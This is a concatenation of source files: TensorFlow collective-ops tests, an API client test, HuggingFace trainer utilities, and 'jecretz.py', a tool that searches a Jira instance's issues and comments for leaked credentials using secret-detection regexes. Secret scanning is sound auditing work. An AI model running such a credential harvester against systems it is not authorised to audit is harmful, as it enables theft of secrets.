# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
with self.session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})) as sess:
with ops.device('/CPU:0'):
in0 = constant_op.constant(t0)
c0 = collective_ops.all_gather(in0, 2, group_key, instance_key)
with ops.device('/CPU:1'):
in1 = constant_op.constant(t1)
c1 = collective_ops.all_gather(in1, 2, group_key, instance_key)
run_options = config_pb2.RunOptions()
run_options.experimental.collective_graph_key = 1
with self.assertRaisesRegex(errors.InvalidArgumentError,
'Shape mismatch'):
sess.run([c0, c1], options=run_options)
def testCollectiveGatherPolymorphicShape(self):
t0 = [0, 1, 2, 3, 4, 5, 6, 7]
t1 = [10, 11, 12, 13, 14, 15, 16, 17]
group_size = 2
group_key = 1
instance_key = 123
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
with self.session(
config=config_pb2.ConfigProto(
device_count={'CPU': group_size})) as sess:
with ops.device('/CPU:0'):
in0 = array_ops.placeholder(dtype=dtypes.int32, shape=[None])
c0 = collective_ops.all_gather(in0, group_size, group_key,
instance_key)
with ops.device('/CPU:1'):
in1 = array_ops.placeholder(dtype=dtypes.int32, shape=[None])
c1 = collective_ops.all_gather(in1, group_size, group_key,
instance_key)
results = sess.run([c0, c1], feed_dict={in0: t0, in1: t1})
results_ = sess.run([c0, c1], feed_dict={in0: t0[1:], in1: t1[1:]})
expected_output = [0, 1, 2, 3, 4, 5, 6, 7, 10, 11, 12, 13, 14, 15, 16, 17]
self.assertAllClose(results[0], expected_output, rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], expected_output, rtol=1e-5, atol=1e-5)
expected_output_ = [1, 2, 3, 4, 5, 6, 7, 11, 12, 13, 14, 15, 16, 17]
self.assertAllClose(results_[0], expected_output_, rtol=1e-5, atol=1e-5)
self.assertAllClose(results_[1], expected_output_, rtol=1e-5, atol=1e-5)
@test_util.run_v2_only
def testCollectiveGroupSizeMismatch(self):
cpus = config.list_physical_devices('CPU')
self.assertEqual(len(cpus), 1)
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
context.ensure_initialized()
@def_function.function
def run_all_reduce():
group_key = 10
instance_key = 20
t0 = [1, 2, 3, 4]
t1 = [5, 6, 7, 8]
with ops.device('/CPU:0'):
in0 = constant_op.constant(t0)
c0 = collective_ops.all_reduce(
in0, group_size=2, group_key=group_key, instance_key=instance_key,
merge_op='Add', final_op='Id')
with ops.device('/CPU:1'):
in1 = constant_op.constant(t1)
c1 = collective_ops.all_reduce(
in1, group_size=3, group_key=group_key, instance_key=instance_key,
merge_op='Add', final_op='Id')
return c0, c1
with self.assertRaisesRegex(errors.InternalError,
'but that group has size'):
run_all_reduce()
@test_util.run_v2_only
def testCollectiveTensorsHaveNoDeviceSpecified(self):
cpus = config.list_physical_devices('CPU')
self.assertEqual(len(cpus), 1)
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
context.ensure_initialized()
group_size = 2
group_key = 1
instance_key = 1
@def_function.function
def fn(all_args):
results = []
# The inputs have no devices set. This is expected to be a trace-time
# check only.
self.assertEqual(all_args[0].device, '')
self.assertEqual(all_args[1].device, '')
with ops.device('/CPU:0'):
results.append(
collective_ops.all_reduce(all_args[0], group_size, group_key,
instance_key, 'Add', 'Div'))
with ops.device('/CPU:1'):
results.append(
collective_ops.all_reduce(all_args[1], group_size, group_key,
instance_key, 'Add', 'Div'))
return results
with ops.device('/CPU:0'):
in0 = constant_op.constant(1)
with ops.device('/CPU:1'):
in1 = constant_op.constant(3)
result = fn([in0, in1])
self.assertAllClose(result, [2, 2])
@test_util.run_v2_only
def testCollectiveGroupSizeOne(self):
group_size = 1
group_key = 100
instance_key = 100
in_value = [1, 2, 3, 4]
in_tensor = constant_op.constant(in_value)
reduced_tensor = collective_ops.all_reduce(
in_tensor, group_size, group_key, instance_key, 'Add', 'Id')
self.assertAllEqual(in_value, reduced_tensor.numpy())
gathered_tensor = collective_ops.all_gather(
in_tensor, group_size, group_key, instance_key)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testConstantWithScopedAllocator(self):
group_size = 2
group_key = 1
instance_key1 = 1
instance_key2 = 2
graph_options = config_pb2.GraphOptions(
optimizer_options=config_pb2.OptimizerOptions(do_constant_folding=True))
cfg = config_pb2.ConfigProto(device_count={'CPU': group_size},
graph_options=graph_options)
rewrite_options = cfg.graph_options.rewrite_options
rewrite_options.scoped_allocator_optimization = (
rewriter_config_pb2.RewriterConfig.ON)
del rewrite_options.scoped_allocator_opts.enable_op[:]
rewrite_options.scoped_allocator_opts.enable_op.append('CollectiveReduce')
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
with self.session(config=cfg) as sess:
run_ops = []
for i in range(group_size):
with ops.device('CPU:%d' % i):
constant = constant_op.constant(i + 1.)
input_tensor1 = array_ops.identity(constant)
input_tensor2 = array_ops.identity(constant)
reduced_tensor1 = collective_ops.all_reduce(
input_tensor1, group_size, group_key, instance_key1, 'Add',
'Id')
reduced_tensor2 = collective_ops.all_reduce(
input_tensor2, group_size, group_key, instance_key2, 'Add',
'Id')
run_ops.append(array_ops.identity(reduced_tensor1))
run_ops.append(array_ops.identity(reduced_tensor2))
results = sess.run(run_ops)
self.assertEqual(results, [3., 3., 3., 3.])
@test_util.run_v2_only
def testMultipleGroups(self):
cpus = config.list_physical_devices('CPU')
self.assertEqual(len(cpus), 1)
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
context.ensure_initialized()
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [group_key for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/CPU:{}'.format(device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(collective_ops.all_reduce(
input_tensor, group_size, group_key, instance_key, merge_op='Add',
final_op='Id'))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[group_key * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@test_util.run_v2_only
def testAbortGroupParamsResolution(self):
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant(1.)
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# Reset the context in order to reset the collective executor.
context._reset_context() # pylint: disable=protected-access
t.join()
# After reset non-NCCL collectives should work.
cpus = config.list_physical_devices('CPU')
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
def collective_fn():
for device in ['CPU:0', 'CPU:1']:
with ops.device(device):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='ring')
def_function.function(collective_fn)()
@test_util.run_v2_only
def testAbortInstanceParamsResolution(self):
cpus = config.list_physical_devices('CPU')
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant(1.)
def collective_fn():
for device in ['CPU:0', 'CPU:1']:
with ops.device(device):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='ring')
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# Reset the context in order to reset the collective executor.
context._reset_context() # pylint: disable=protected-access
t.join()
# After reset non-NCCL collectives should work.
cpus = config.list_physical_devices('CPU')
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
def_function.function(collective_fn)()
@test_util.run_v2_only
def testAbortRing(self):
cpus = config.list_physical_devices('CPU')
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant(1.)
# First perform a normal collective to finish resolution.
def collective_fn():
for device in ['CPU:0', 'CPU:1']:
with ops.device(device):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='ring')
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# Reset the context in order to reset the collective executor.
t.join()
context._reset_context() # pylint: disable=protected-access
# After reset non-NCCL collectives should work.
cpus = config.list_physical_devices('CPU')
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
def_function.function(collective_fn)()
if __name__ == '__main__':
test.main()
|
test_multiprocessing.py
|
import os
import logging
from multiprocessing import Process
from enverus_direct_access import DirectAccessV2
from tests.utils import set_token
set_token()
LOG_LEVEL = logging.DEBUG
if os.environ.get("GITHUB_SHA"):
LOG_LEVEL = logging.ERROR
DIRECTACCESS_API_KEY = os.environ.get("DIRECTACCESS_API_KEY")
DIRECTACCESS_CLIENT_ID = os.environ.get("DIRECTACCESS_CLIENT_ID")
DIRECTACCESS_CLIENT_SECRET = os.environ.get("DIRECTACCESS_CLIENT_SECRET")
DIRECTACCESS_TOKEN = os.environ.get("DIRECTACCESS_TOKEN")
def query(endpoint, access_token, **options):
"""
Query method target for multiprocessing child processes.
:param endpoint: a valid Direct Access API dataset endpoint
:param access_token: a Direct Access API access token
:param options: kwargs of valid query parameters for the dataset endpoint
:return:
"""
client = DirectAccessV2(
api_key=DIRECTACCESS_API_KEY,
client_id=DIRECTACCESS_CLIENT_ID,
client_secret=DIRECTACCESS_CLIENT_SECRET,
retries=5,
backoff_factor=5,
access_token=access_token,
log_level=LOG_LEVEL,
)
resp = client.query(endpoint, **options)
next(resp)
assert resp
return
def test_multiple_processes():
"""
Launch two child processes, one for rigs and one for permits.
:return:
"""
procs = list()
a = Process(
target=query, kwargs=dict(endpoint="rigs", access_token=DIRECTACCESS_TOKEN)
)
procs.append(a)
b = Process(
target=query, kwargs=dict(endpoint="permits", access_token=DIRECTACCESS_TOKEN)
)
procs.append(b)
[x.start() for x in procs]
[x.join() for x in procs]
return
|
jecretz.py
|
#!/usr/bin/env python3
import argparse
import requests
import re
import os
import sys
import json
import itertools
from rules import custom_rules
from keywords import search_keywords
from textwrap3 import wrap
from queue import Queue
from threading import Thread
from terminaltables import AsciiTable
from urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
from truffleHogRegexes.regexChecks import regexes
issues = []
fetched_issues = {}
search_queue = Queue(maxsize = 0)
task_queue = Queue(maxsize = 0)
results = {}
def request_session():
session = requests.Session()
retries = Retry(total = 5, backoff_factor = 0.1, status_forcelist = [500, 502, 503, 504])
session.mount('http://', HTTPAdapter(max_retries = retries))
session.mount('https://', HTTPAdapter(max_retries = retries))
return session
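# Illustrative usage sketch (assumption, not part of the original tool): the
# session returned above behaves like a plain requests.Session but retries
# transient 5xx responses up to 5 times with backoff, e.g.
#     session = request_session()
#     resp = session.get("https://jira.example.tld/rest/api/2/myself")
# The hostname above is a placeholder.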
def get_token():
try:
with open('config.json', 'r') as file:
config = json.load(file)
return config['token']
except:
print("[-] Authorization token required")
sys.exit(0)
def search(url, keyword, token, issueList = []):
jql_query = 'text ~ "'+keyword+'"'
headers = {'Authorization': token, 'X-Atlassian-Token': 'no-check'}
data = {'startIndex': 0, 'jql': jql_query, 'layoutKey': 'split-view'}
url = url + '/rest/issueNav/1/issueTable'
sys.stdout.write('\r => ' + str(keyword))
sys.stdout.flush()
req = request_session()
try:
response = req.post(url, data=data, headers=headers)
json_response = response.json()
try:
for item in json_response["issueTable"]["issueKeys"]:
issueList.append(item)
except:
print("\n[-] " + keyword + " didn't return any results")
except:
print("\n[-] Something went wrong. Check your auth token. Some-times this could be due to Okta/SSO.")
return issueList
def fetch_issues(url, issueId, token):
issue_details = {"description": "", "comments": []}
comments = []
headers = {'Authorization': token, 'X-Atlassian-Token': 'no-check'}
params = {'fields': ['description', 'comment', 'created' ,'updated']}
url = url + '/rest/api/2/issue/' + issueId
sys.stdout.write('\r => ' + issueId)
sys.stdout.flush()
req = request_session()
try:
response = req.get(url, params=params, headers=headers)
json_response = response.json()
try:
issue_details["description"] = json_response["fields"]["description"]
for comment in json_response["fields"]["comment"]["comments"]:
comments.append(comment["body"])
issue_details["comments"] = comments
except:
print("\n[-] Error fetching issue " + issueId)
except:
print("\n[-] Error reaching Jira. Skipping " + issueId)
return issue_details
def flatten_list(array):
for items in array:
for element in items:
yield element
def check_credentials():
rules = regexes.copy()
rules.update(custom_rules)
for item in fetched_issues:
sys.stdout.write('\r => ' + item)
sys.stdout.flush()
output = {}
comments = []
description = fetched_issues[item]["description"]
for comment in fetched_issues[item]["comments"]:
comments.append(comment)
d_match = []
c_match = []
for rule in rules:
pattern = re.compile(rules[rule])
            d_match.append(pattern.findall(str(description)))  # note: passing re.UNICODE here would be treated as a start position and skip the first 32 chars
for comment in comments:
                c_match.append(pattern.findall(str(comment)))
output["description"] = list(flatten_list(d_match))
output["comments"] = list(flatten_list(c_match))
results[item] = output
def display_results(results, save, out = None):
table_data = []
table_data.append(['Issue ID', 'Description', 'Comments'])
table = AsciiTable(table_data)
max_width = table.column_max_width(1)
align_width = int(max_width/2)
for result in results:
description = results[result]["description"]
comments = results[result]["comments"]
if not description and not comments:
continue
if not description:
description = "--"
if not comments:
comments = "--"
if len(str(description)) > align_width:
description = '\n'.join(wrap(str(description), align_width))
if len(str(comments)) > align_width:
comments = '\n'.join(wrap(str(comments), align_width))
table.table_data.append([result, description, comments])
table.inner_row_border = True
print(table.table)
print("[+] Returned " + str(len(table.table_data) - 1) + " items\n")
if save:
output = "\n[+] Jecretz Results\n\n" + table.table + "\n\n[+] Returned " + str(len(table.table_data) - 1) + " items\n\n"
with open(out, "w") as file:
file.write(output)
def search_worker(url, token):
while True:
keyword = search_queue.get()
if not keyword:
break
search(url, keyword, token, issues)
search_queue.task_done()
def task_worker(url, token):
while True:
issueId = task_queue.get()
details = fetch_issues(url, issueId, token)
fetched_issues[issueId] = details
task_queue.task_done()
def start_thread(worker, url, token, threads):
for i in range(threads):
thread = Thread(target=worker, args = (url, token))
thread.daemon = True
thread.start()
def main():
argparser = argparse.ArgumentParser(description = 'Jecretz, Jira Secrets Hunter')
argparser.add_argument('-u', '--url', help = 'jira instance url, eg: https://jira.domain.tld/', required = True)
argparser.add_argument('-t', '--threads', metavar = 'threads', default = 10, help = 'default: 10', type = int)
argparser.add_argument('-o', '--out', metavar = 'file', help = 'file to save output to, eg: -o output.txt')
args = argparser.parse_args()
if args.url.endswith('/'):
args.url = args.url[:-1]
url = args.url
threads = args.threads
save = 0
if args.out:
save = 1
token = get_token()
print("[+] Initiating search..")
for item in sorted(search_keywords, key = len):
search_queue.put(item)
start_thread(search_worker, url, token, threads)
search_queue.join()
issue_set = list(set(issues))
print("\n[+] Search returned " + str(len(issue_set)) + " tickets")
print("[+] Fetching Jira Issues..")
start_thread(task_worker, url, token, threads)
for issueId in issue_set:
task_queue.put(issueId)
task_queue.join()
print("\n[+] Analyzing..")
check_credentials()
print("\n[+] Results\n")
if save:
display_results(results, save, args.out)
else:
display_results(results, 0)
if __name__ == "__main__":
main()
|
trainer_utils.py
|
# coding=utf-8
# Copyright 2020-present the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utilities for the Trainer and TFTrainer class. Should be independent of PyTorch and TensorFlow.
"""
import copy
import functools
import gc
import inspect
import os
import random
import re
import threading
import time
from typing import Any, Dict, NamedTuple, Optional, Tuple, Union
import numpy as np
from .file_utils import (
ExplicitEnum,
is_psutil_available,
is_sagemaker_dp_enabled,
is_tf_available,
is_torch_available,
is_torch_cuda_available,
is_torch_tpu_available,
)
if is_torch_available():
import torch
if is_tf_available():
import tensorflow as tf
def set_seed(seed: int):
"""
Helper function for reproducible behavior to set the seed in ``random``, ``numpy``, ``torch`` and/or ``tf`` (if
installed).
Args:
seed (:obj:`int`): The seed to set.
"""
random.seed(seed)
np.random.seed(seed)
if is_torch_available():
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# ^^ safe to call this function even if cuda is not available
if is_tf_available():
tf.random.set_seed(seed)
class EvalPrediction(NamedTuple):
"""
Evaluation output (always contains labels), to be used to compute metrics.
Parameters:
predictions (:obj:`np.ndarray`): Predictions of the model.
label_ids (:obj:`np.ndarray`): Targets to be matched.
"""
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: np.ndarray
class EvalLoopOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[np.ndarray]
metrics: Optional[Dict[str, float]]
num_samples: Optional[int]
class PredictionOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[np.ndarray]
metrics: Optional[Dict[str, float]]
class TrainOutput(NamedTuple):
global_step: int
training_loss: float
metrics: Dict[str, float]
PREFIX_CHECKPOINT_DIR = "checkpoint"
_re_checkpoint = re.compile(r"^" + PREFIX_CHECKPOINT_DIR + r"\-(\d+)$")
def get_last_checkpoint(folder):
content = os.listdir(folder)
checkpoints = [
path
for path in content
if _re_checkpoint.search(path) is not None and os.path.isdir(os.path.join(folder, path))
]
if len(checkpoints) == 0:
return
return os.path.join(folder, max(checkpoints, key=lambda x: int(_re_checkpoint.search(x).groups()[0])))
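# Illustrative sketch (not part of the original module): given a folder that
# contains "checkpoint-500" and "checkpoint-1000" among other entries, the
# helper above returns the highest-numbered checkpoint path, e.g.
#     get_last_checkpoint("output_dir")  # -> "output_dir/checkpoint-1000"
# "output_dir" and the step numbers are assumed values for demonstration.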
class IntervalStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class EvaluationStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class HubStrategy(ExplicitEnum):
END = "end"
EVERY_SAVE = "every_save"
CHECKPOINT = "checkpoint"
ALL_CHECKPOINTS = "all_checkpoints"
class BestRun(NamedTuple):
"""
    The best run found by a hyperparameter search (see :class:`~transformers.Trainer.hyperparameter_search`).
Parameters:
run_id (:obj:`str`):
The id of the best run (if models were saved, the corresponding checkpoint will be in the folder ending
with run-{run_id}).
objective (:obj:`float`):
The objective that was obtained for this run.
hyperparameters (:obj:`Dict[str, Any]`):
The hyperparameters picked to get this run.
"""
run_id: str
objective: float
hyperparameters: Dict[str, Any]
def default_compute_objective(metrics: Dict[str, float]) -> float:
"""
    The default objective to maximize/minimize when doing a hyperparameter search. It is the evaluation loss if no
metrics are provided to the :class:`~transformers.Trainer`, the sum of all metrics otherwise.
Args:
metrics (:obj:`Dict[str, float]`): The metrics returned by the evaluate method.
Return:
:obj:`float`: The objective to minimize or maximize
"""
metrics = copy.deepcopy(metrics)
loss = metrics.pop("eval_loss", None)
_ = metrics.pop("epoch", None)
# Remove speed metrics
speed_metrics = [m for m in metrics.keys() if m.endswith("_runtime") or m.endswith("_per_second")]
for sm in speed_metrics:
_ = metrics.pop(sm, None)
return loss if len(metrics) == 0 else sum(metrics.values())
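# Worked example (illustrative, not part of the original module): for metrics
# {"eval_loss": 0.35, "epoch": 2.0, "eval_runtime": 12.3} the loss is popped,
# "epoch" and the speed metrics are dropped, nothing else remains, so the
# objective is 0.35. If extra metrics such as "eval_accuracy": 0.9 and
# "eval_f1": 0.8 were present, the objective would instead be 0.9 + 0.8 = 1.7.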
def default_hp_space_optuna(trial) -> Dict[str, float]:
from .integrations import is_optuna_available
assert is_optuna_available(), "This function needs Optuna installed: `pip install optuna`"
return {
"learning_rate": trial.suggest_float("learning_rate", 1e-6, 1e-4, log=True),
"num_train_epochs": trial.suggest_int("num_train_epochs", 1, 5),
"seed": trial.suggest_int("seed", 1, 40),
"per_device_train_batch_size": trial.suggest_categorical("per_device_train_batch_size", [4, 8, 16, 32, 64]),
}
def default_hp_space_ray(trial) -> Dict[str, float]:
from .integrations import is_ray_tune_available
assert is_ray_tune_available(), "This function needs ray installed: `pip " "install ray[tune]`"
from ray import tune
return {
"learning_rate": tune.loguniform(1e-6, 1e-4),
"num_train_epochs": tune.choice(list(range(1, 6))),
"seed": tune.uniform(1, 40),
"per_device_train_batch_size": tune.choice([4, 8, 16, 32, 64]),
}
class HPSearchBackend(ExplicitEnum):
OPTUNA = "optuna"
RAY = "ray"
default_hp_space = {
HPSearchBackend.OPTUNA: default_hp_space_optuna,
HPSearchBackend.RAY: default_hp_space_ray,
}
def is_main_process(local_rank):
"""
    Whether or not the current process is the local main process, based on `xm.get_ordinal()` (for TPUs) first, then on
`local_rank`.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.get_ordinal() == 0
return local_rank in [-1, 0]
def total_processes_number(local_rank):
"""
Return the number of processes launched in parallel. Works with `torch.distributed` and TPUs.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.xrt_world_size()
elif is_sagemaker_dp_enabled():
import smdistributed.dataparallel.torch.distributed as dist
return dist.get_world_size()
elif local_rank != -1 and is_torch_available():
import torch
return torch.distributed.get_world_size()
return 1
def speed_metrics(split, start_time, num_samples=None, num_steps=None):
"""
Measure and return speed performance metrics.
This function requires a time snapshot `start_time` before the operation to be measured starts and this function
should be run immediately after the operation to be measured has completed.
Args:
- split: name to prefix metric (like train, eval, test...)
- start_time: operation start time
    - num_samples: number of samples processed
    - num_steps: number of steps processed
    """
runtime = time.time() - start_time
result = {f"{split}_runtime": round(runtime, 4)}
if num_samples is not None:
samples_per_second = num_samples / runtime
result[f"{split}_samples_per_second"] = round(samples_per_second, 3)
if num_steps is not None:
steps_per_second = num_steps / runtime
result[f"{split}_steps_per_second"] = round(steps_per_second, 3)
return result
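# Illustrative usage sketch (not part of the original module): take a time
# snapshot before the measured operation and call speed_metrics right after it
# completes, e.g.
#     start_time = time.time()
#     # ... run evaluation over 128 samples in 64 steps ...
#     metrics = speed_metrics("eval", start_time, num_samples=128, num_steps=64)
#     # -> {"eval_runtime": ..., "eval_samples_per_second": ...,
#     #     "eval_steps_per_second": ...}
# The sample and step counts are assumed values for demonstration.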
class SchedulerType(ExplicitEnum):
LINEAR = "linear"
COSINE = "cosine"
COSINE_WITH_RESTARTS = "cosine_with_restarts"
POLYNOMIAL = "polynomial"
CONSTANT = "constant"
CONSTANT_WITH_WARMUP = "constant_with_warmup"
class TrainerMemoryTracker:
"""
A helper class that tracks cpu and gpu memory.
This class will silently skip unless ``psutil`` is available. Install with ``pip install psutil``.
When a stage completes, it can pass metrics dict to update with the memory metrics gathered during this stage.
Example ::
self._memory_tracker = TrainerMemoryTracker(self.args.skip_memory_metrics)
self._memory_tracker.start()
code ...
metrics = {"train_runtime": 10.5}
self._memory_tracker.stop_and_update_metrics(metrics)
At the moment GPU tracking is only for ``pytorch``, but can be extended to support ``tensorflow``.
To understand this class' intricacies please read the documentation of :meth:`~transformers.Trainer.log_metrics`.
"""
# map trainer methods to metrics prefix
stages = {
"__init__": "init",
"train": "train",
"evaluate": "eval",
"predict": "test",
}
def __init__(self, skip_memory_metrics=False):
self.skip_memory_metrics = skip_memory_metrics
if not is_psutil_available():
# soft dependency on psutil
self.skip_memory_metrics = True
if self.skip_memory_metrics:
return
import psutil # noqa
if is_torch_cuda_available():
import torch
self.torch = torch
self.gpu = {}
else:
self.torch = None
self.process = psutil.Process()
self.cur_stage = None
self.cpu = {}
self.init_reported = False
def derive_stage(self):
"""derives the stage/caller name automatically"""
caller = inspect.currentframe().f_back.f_back.f_code.co_name
if caller in self.stages:
return self.stages[caller]
else:
raise ValueError(
f"was called from {caller}, but only expect to be called from one of {self.stages.keys()}"
)
def cpu_mem_used(self):
"""get resident set size memory for the current process"""
return self.process.memory_info().rss
def peak_monitor_func(self):
self.cpu_mem_used_peak = -1
while True:
self.cpu_mem_used_peak = max(self.cpu_mem_used(), self.cpu_mem_used_peak)
# can't sleep or will not catch the peak right (this comment is here on purpose)
# time.sleep(0.001) # 1msec
if not self.peak_monitoring:
break
def start(self):
"""start tracking for the caller's stage"""
if self.skip_memory_metrics:
return
stage = self.derive_stage()
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
self.cur_stage = stage
gc.collect()
if self.torch is not None:
self.torch.cuda.reset_peak_memory_stats()
self.torch.cuda.empty_cache()
# gpu
if self.torch is not None:
self.gpu_mem_used_at_start = self.torch.cuda.memory_allocated()
# cpu
self.cpu_mem_used_at_start = self.cpu_mem_used()
self.peak_monitoring = True
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def stop(self, stage):
"""stop tracking for the passed stage"""
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# this sends a signal to peak_monitor_func to complete its loop
self.peak_monitoring = False
# first ensure all objects get collected and their memory is freed
gc.collect()
if self.torch is not None:
self.torch.cuda.empty_cache()
# concepts:
# - alloc_delta: the difference of allocated memory between the end and the start
# - peaked_delta: the difference between the peak memory and the current memory
# in order to know how much memory the measured code consumed one needs to sum these two
# gpu
if self.torch is not None:
self.gpu_mem_used_now = self.torch.cuda.memory_allocated()
self.gpu_mem_used_peak = self.torch.cuda.max_memory_allocated()
self.gpu[self.cur_stage] = dict(
alloc=(self.gpu_mem_used_now - self.gpu_mem_used_at_start),
peaked=max(0, self.gpu_mem_used_peak - self.gpu_mem_used_now),
)
# cpu
self.cpu_mem_used_now = self.cpu_mem_used()
self.cpu[self.cur_stage] = dict(
alloc=(self.cpu_mem_used_now - self.cpu_mem_used_at_start),
peaked=max(0, self.cpu_mem_used_peak - self.cpu_mem_used_now),
)
# reset - cycle finished
self.cur_stage = None
def update_metrics(self, stage, metrics):
"""updates the metrics"""
if self.skip_memory_metrics:
return
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# since we don't have a way to return init metrics, we push them into the first of train/val/predict
stages = [stage]
if not self.init_reported:
stages.insert(0, "init")
self.init_reported = True
for stage in stages:
for t in ["alloc", "peaked"]:
if stage in self.cpu and t in self.cpu[stage]:
metrics[f"{stage}_mem_cpu_{t}_delta"] = self.cpu[stage][t]
if self.torch is not None and stage in self.gpu and t in self.gpu[stage]:
metrics[f"{stage}_mem_gpu_{t}_delta"] = self.gpu[stage][t]
def stop_and_update_metrics(self, metrics=None):
"""combine stop and metrics update in one call for simpler code"""
if self.skip_memory_metrics:
return
stage = self.derive_stage()
self.stop(stage)
# init doesn't have metrics to update so we just save that data for later stages to retrieve
if metrics is not None:
self.update_metrics(stage, metrics)
def denumpify_detensorize(metrics):
"""
    Recursively calls `.item()` on the elements of the passed list, tuple, or dictionary, converting NumPy scalars and single-element PyTorch tensors to plain Python numbers.
"""
if isinstance(metrics, (list, tuple)):
return type(metrics)(denumpify_detensorize(m) for m in metrics)
elif isinstance(metrics, dict):
return type(metrics)({k: denumpify_detensorize(v) for k, v in metrics.items()})
elif isinstance(metrics, np.generic):
return metrics.item()
elif is_torch_available() and isinstance(metrics, torch.Tensor) and metrics.numel() == 1:
return metrics.item()
return metrics
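# Worked example (illustrative, not part of the original module): nested
# containers are converted element-wise, e.g.
#     denumpify_detensorize({"acc": np.float32(0.5), "steps": [np.int64(3)]})
#     # -> {"acc": 0.5, "steps": [3]}
# Single-element torch tensors are likewise unwrapped via .item().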
def number_of_arguments(func):
"""
Return the number of arguments of the passed function, even if it's a partial function.
"""
if isinstance(func, functools.partial):
total_args = len(inspect.signature(func.func).parameters)
return total_args - len(func.args) - len(func.keywords)
return len(inspect.signature(func).parameters)
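# Worked example (illustrative, not part of the original module):
#     def compute(a, b, c): ...
#     number_of_arguments(compute)                        # -> 3
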